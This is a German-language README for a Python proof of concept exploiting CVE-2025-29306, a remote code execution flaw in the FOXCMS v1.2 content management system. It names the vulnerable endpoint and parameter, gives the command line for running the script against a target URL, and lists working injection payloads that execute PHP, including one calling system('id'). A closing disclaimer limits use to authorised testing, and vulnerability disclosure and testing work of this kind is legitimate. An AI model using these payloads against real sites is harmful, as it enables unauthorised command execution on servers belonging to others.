
Python PoC für CVE-2025-29306, eine Parameter-Injection-RCE in FOXCMS v1.2. Injiziert PHP-Code über den id-Parameter auf /images/index.html für autorisierte Sicherheitstests.
Dieses Repository enthält einen Python-basierten PoC für eine Remote Code Execution (RCE)-Schwachstelle, die FOXCMS v1.2 betrifft, ein chinesisches Open-Source-Content-Management-System.
CVE-ID: CVE-2025-29306
Betrifft: FOXCMS v1.2
Typ: Service Parameter Injection → Code Execution
FOXCMS leidet unter einem unsicheren Parameter-Parsing-Mechanismus im id-Parameter auf dem Endpunkt /images/index.html. Dies ermöglicht die Injektion von Payloads mittels ${@print()}-Ausdrücken, was zur PHP-Codeausführung führt.
requests-Bibliothekpip install requests
# Usage
python foxcms_poc.py http://target.com/images/index.html?id=
# The script uses payloads like:
${@print(phpinfo())}
${@print(system('id'))}
Dieser Code dient ausschließlich zu Bildungszwecken und autorisierten Sicherheitstests. Verwenden Sie ihn NICHT auf Systemen, die Sie nicht besitzen oder für die Sie keine Berechtigung zum Testen haben.
Autor Inok009